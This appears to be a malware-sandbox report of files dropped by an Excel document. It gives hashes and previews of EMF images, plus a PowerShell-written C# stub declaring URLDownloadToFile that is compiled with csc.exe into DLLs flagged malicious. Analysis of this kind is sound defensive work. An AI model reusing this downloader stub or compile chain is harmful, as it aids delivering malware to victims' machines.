                                                                Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):44256
                                                                Entropy (8bit):3.15066292565687
                                                                Encrypted:false
                                                                SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                                                                MD5:F1EC2E98B0F577B675156B13DCF94105
                                                                SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                                                                SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                                                                SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                                                                Malicious:false
                                                                Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):44256
                                                                Entropy (8bit):3.147465798679962
                                                                Encrypted:false
                                                                SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                                                                MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                                                                SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                                                                SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                                                                SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                                                                Malicious:false
                                                                Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):1293620
                                                                Entropy (8bit):4.563127917199792
                                                                Encrypted:false
                                                                SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                Malicious:false
                                                                Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):13284
                                                                Entropy (8bit):2.721890413361754
                                                                Encrypted:false
                                                                SSDEEP:96:9pyRiCCyydtY5YkBJYstgWqjmLRQS1lkQJ8/tIdSUsQ5lV:9joObWPb1pGpQR
                                                                MD5:64389AE456210E7353BD9F7D9C8EBB26
                                                                SHA1:2E2A820EEC50A0CAF659C8A1747A2C161A81A067
                                                                SHA-256:26F6FE29563F2DE0D66D9EB2F963F00CBA0211E9F1DA8BBCDC9426E76B328ACE
                                                                SHA-512:FF679773F635DBD0FC940B880D04D77FB18786EA566CA83A348CBA36FA82EAFFD1AA76D9D4871C66580AED5FD65A8187C29C3A0BBAD8E38D0C83CA2C7886D5D7
                                                                Malicious:false
                                                                Preview:....l...........#...V...........Z&...... EMF.....3..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W...R...p.................................. C.a.l.i.b.r.i........................................................................................'/....h./...'/........................h./.............../.N.'/.............m'/../.............../......./......./...'/........../.../..'/
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):8084
                                                                Entropy (8bit):2.5551694039574895
                                                                Encrypted:false
                                                                SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
                                                                MD5:721E8AAC81F0A6D4659831CB8194D668
                                                                SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
                                                                SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
                                                                SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
                                                                Malicious:false
                                                                Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                Category:dropped
                                                                Size (bytes):1293620
                                                                Entropy (8bit):4.563127917199792
                                                                Encrypted:false
                                                                SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                Malicious:false
                                                                Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (358)
                                                                Category:dropped
                                                                Size (bytes):467
                                                                Entropy (8bit):3.6338036010459898
                                                                Encrypted:false
                                                                SSDEEP:6:V/DsYLDS81zu5vFF0svOmMmQXReKJ8SRHy4H4SlPmHigOwnQy:V/DTLDfuDz2dXfHAQy
                                                                MD5:773DC6CCE0B58D96F866A82999AEB27A
                                                                SHA1:EB94F2107C3413B9D3B836A4A8F7FE1B5385E53C
                                                                SHA-256:03732294582D4D93597043D70029F05476E498D1FFA698D1C51D4C377D3D8311
                                                                SHA-512:1194741AF23CDBE54B379F5555FA7E74F0F0287B357497CF76B63895803EF941454E4CE1C42A8D232C94262580CB62AC0F851FF5A1D9FDC52D9ED4A0AC68CE24
                                                                Malicious:false
                                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace cP.{. public class uUS. {. [DllImport("URlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZbPgFt,string jX,string lWuXyEHU,uint Abt,IntPtr pTBw);.. }..}.
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):369
                                                                Entropy (8bit):5.291174883863936
                                                                Encrypted:false
                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fkVaOMVqzxs7+AEszIP23fkVaOMVh9n:p37Lvkmb6KzeWZEoT
                                                                MD5:D6F4A41EFDB19519029F591E4EC31226
                                                                SHA1:27769886FC841AABB1B85EF615260056876740C4
                                                                SHA-256:2A0C09452D6C67AA6B624A74D492FF3D7123F7CA0C3DA1E1829C4B76A8A4656C
                                                                SHA-512:1E1593B186DA008D414A23E8A2B0E79630E1E78C869A141169ED86A505E3CF1F2DC38342D272A55D2870E96960897ADAA497577351EBDBA54CD64839A9526D8F
                                                                Malicious:true
                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.0.cs"
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3072
                                                                Entropy (8bit):2.792954949023635
                                                                Encrypted:false
                                                                SSDEEP:24:etGSKJOJK3lz8s2gkxrJtJ1PtkZfnmSryWWI+ycuZhNkMakSPBPNnqI:6xY3uRrXJ1uJn3ryd1ul3a3rqI
                                                                MD5:26887A01E8CD6485B15BED5279CF91D2
                                                                SHA1:FDB334ACD7B55FC756DBD198F56ECACC5CE31E69
                                                                SHA-256:2ED072E194759103D527C9491E24848ABDD334B38DE0F554EB027C982496CC9F
                                                                SHA-512:FE4CF174CDFCCA883D908B1401CDEA1D3BC179FB0895B3FBFC0E0D1B40FAF68DF79C28D9CC8322732A69A40DCAA7F89610ED57149403C9FA8CBF1364D8BD7D35
                                                                Malicious:true
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Re\g...........!.................#... ...@....... ....................................@.................................L#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3..............................................................'.....i.....i.......................................... 5.....P ......G.........M.....T.....W.....`.....d...G.....G...!.G.....G.......!.....*.......5..................................................<Module>.1d
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                Category:modified
                                                                Size (bytes):866
                                                                Entropy (8bit):5.3634705090761905
                                                                Encrypted:false
                                                                SSDEEP:24:AId3ka6KzfEoyKaMD5DqBVKVrdFAMBJTH:Akka60fEoyKdDcVKdBJj
                                                                MD5:E109458E80AA925BB358A4670C249BA5
                                                                SHA1:2F445D8A381689E6AE60622BE0C177129E86A6F2
                                                                SHA-256:045DF8F61464567B361B0501B0E347ED173DB8F510D81C4726B9E882CABB0183
                                                                SHA-512:9FAF5EDB4744E3B6290CBE0BC1B5398C46D040AD1DA1C13C8A49F92A0F9C9A18B4E1D7CB0687DE56E3D4A6F3FA7BCE13CE602C62480C9C86B8524F369D5B0B14
                                                                Malicious:false
                                                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:MSVC .res
                                                                Category:dropped
                                                                Size (bytes):652
                                                                Entropy (8bit):3.1062153102291252
                                                                Encrypted:false
                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grymDMak7Ynqq7DBPN5Dlq5J:+RI+ycuZhNkMakSPBPNnqX
                                                                MD5:BD05ED91F26DB86914FD71C5EF5AED5B
                                                                SHA1:6E4CEC5460DE53AF7CEF87F04945156605170D6D
                                                                SHA-256:FFD82F330ED8B973DB9B746D570A46619557163A06135955D93F29B190F09613
                                                                SHA-512:155E3E77D35311A987B7B6E10DD0C25B1A6151C7580EE115F1D1A1F4AD27F2EF6FA53928C5B38B19FFE398AAB53B7DE93D390A0EBA319115BEC23A2BCF404D88
                                                                Malicious:false
                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.d.k.2.y.0.4.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.d.k.2.y.0.4.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 13 16:48:38 2024, 1st section name ".debug$S"
                                                                Category:dropped
                                                                Size (bytes):1328
                                                                Entropy (8bit):3.978975589742134
                                                                Encrypted:false
                                                                SSDEEP:24:HMe9E2U95yv4dHlwKdNWI+ycuZhNxakSPPNnqSqd:c95YwmKd41ulxa3NqSK
                                                                MD5:5DF676C46F5869DD7DCF6BBBE9B96165
                                                                SHA1:97AEA7506A1F397BB286B1BDD9C0C8BC893FC53B
                                                                SHA-256:D8B69546A0A75F09AC400D39A822B24C3259AB3D4018DADB600FC54A91BE3729
                                                                SHA-512:469B5FEA0978BC4DC88B064BE408FAFDEB93EDDC5519152D4C4D2D00927B5412DC620E6634179BA7159AEED600280CE893B942ACCCE796C427A1763DD428AB25
                                                                Malicious:false
                                                                Preview:L...fe\g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\u10solcd\CSCB37CF81CE4334084B75C7031C6A4882F.TMP...................}~...2z]IZ..........4.......C:\Users\user\AppData\Local\Temp\RES367B.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.1.0.s.o.l.c.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 13 16:48:18 2024, 1st section name ".debug$S"
                                                                Category:dropped
                                                                Size (bytes):1328
                                                                Entropy (8bit):3.979950494855002
                                                                Encrypted:false
                                                                SSDEEP:24:HQe9EurhYtdH2wKdNWI+ycuZhNkMakSPBPNnqSqd:trQ1Kd41ul3a3rqSK
                                                                MD5:942A42035DEF9A623EFCBD09EB2A65F1
                                                                SHA1:A29DF793078943D8C02C7DE3603EF3517F7477A2
                                                                SHA-256:EF3628BB2ECE7FD72816E0B1CEAA7CA7D9F932C3F70FF14C4B913FA4E0223936
                                                                SHA-512:8BCBA99C16E5165A74FC406519E8273F3107DE35CD2788C1021B2F54E662BDA8532D73397CBCC52C445C39F05CF90549A67F9685FDDA4F667BB3BC82B44F8352
                                                                Malicious:false
                                                                Preview:L...Re\g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\1dk2y04d\CSCA659ECAEC3554F2F90108FC5834CA54.TMP....................m.i..q..Z.[..........4.......C:\Users\user\AppData\Local\Temp\RESE734.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.d.k.2.y.0.4.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:MSVC .res
                                                                Category:dropped
                                                                Size (bytes):652
                                                                Entropy (8bit):3.083274228953474
                                                                Encrypted:false
                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTak7YnqqPPN5Dlq5J:+RI+ycuZhNxakSPPNnqX
                                                                MD5:DDBBAB1FC9BE7D7E0F9AEF327A5D495A
                                                                SHA1:4C40DD6AB075BA5587DBBEE48FD6080F6E40B814
                                                                SHA-256:80838AD67770E761806B000954BB11A6816363D073CC74AD9D2C7AE6948B8C97
                                                                SHA-512:99FC3E2D9CE1D8C2BA6C35D0D10A8F73EEF4CF2DB9D33044B2BB8E532AE5A0EA8642EB006295FCCE9DE68EDE259FADF3F0F967C3259618A4F7348753BCADEF52
                                                                Malicious:false
                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.1.0.s.o.l.c.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.1.0.s.o.l.c.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (358)
                                                                Category:dropped
                                                                Size (bytes):467
                                                                Entropy (8bit):3.6338036010459898
                                                                Encrypted:false
                                                                SSDEEP:6:V/DsYLDS81zu5vFF0svOmMmQXReKJ8SRHy4H4SlPmHigOwnQy:V/DTLDfuDz2dXfHAQy
                                                                MD5:773DC6CCE0B58D96F866A82999AEB27A
                                                                SHA1:EB94F2107C3413B9D3B836A4A8F7FE1B5385E53C
                                                                SHA-256:03732294582D4D93597043D70029F05476E498D1FFA698D1C51D4C377D3D8311
                                                                SHA-512:1194741AF23CDBE54B379F5555FA7E74F0F0287B357497CF76B63895803EF941454E4CE1C42A8D232C94262580CB62AC0F851FF5A1D9FDC52D9ED4A0AC68CE24
                                                                Malicious:false
                                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace cP.{. public class uUS. {. [DllImport("URlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZbPgFt,string jX,string lWuXyEHU,uint Abt,IntPtr pTBw);.. }..}.
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):369
                                                                Entropy (8bit):5.19873855302094
                                                                Encrypted:false
                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fl00BUzxs7+AEszIP23fl00bn:p37Lvkmb6Kz90gUWZEo90+
                                                                MD5:6FC6F595116BFCE7651539E67ADBF267
                                                                SHA1:EC22A4A89E263443C6223239AB4DE5C1F9DA03C8
                                                                SHA-256:174E00AD48C767B0330D26F45A48A8F975949423D2BCC96938901230D0487D40
                                                                SHA-512:43479C376DC6871456776F47F0C653BA9F3E03F46AE1BEF1F4313AD47AF4EB8C84287D604796E146587BE3FE58D3CADE18A67F50C6E4990C1963A7C4DC410487
                                                                Malicious:false
                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.0.cs"
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3072
                                                                Entropy (8bit):2.772400116463671
                                                                Encrypted:false
                                                                SSDEEP:24:etGSGJOJK3lz8s2gkxrbTtJ1PtkZfbhmvryWWI+ycuZhNxakSPPNnqI:6VY3uRrbJJ1uJbh+ryd1ulxa3NqI
                                                                MD5:108FDE370B17ACF1357AE444ACE0F05C
                                                                SHA1:D588E5491195746A0C38E74D4842AA1C1E41C9F3
                                                                SHA-256:5DB3AD6C2E2EB2E17A2039ECE576851ED960A53FBA9379E9FCC0E8DFFCFA430E
                                                                SHA-512:EA91AEC832F87BCA20B87523AE214E7E108EC75D88D2A01EDA2C65D2DF65BB17CA460173B0D36CBA9664E20544979177C129641438FD125DEC6EDBEAE7DE23AF
                                                                Malicious:true
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...fe\g...........!.................#... ...@....... ....................................@.................................L#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3..............................................................'.....i.....i.......................................... 5.....P ......G.........M.....T.....W.....`.....d...G.....G...!.G.....G.......!.....*.......5..................................................<Module>.u1
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                Category:modified
                                                                Size (bytes):866
                                                                Entropy (8bit):5.3204067188065105
                                                                Encrypted:false
                                                                SSDEEP:24:AId3ka6Kz9v1Eo9sKaMD5DqBVKVrdFAMBJTH:Akka609v1Eo9sKdDcVKdBJj
                                                                MD5:CAEDB340F65E8BFAA04FA8721AC21D0E
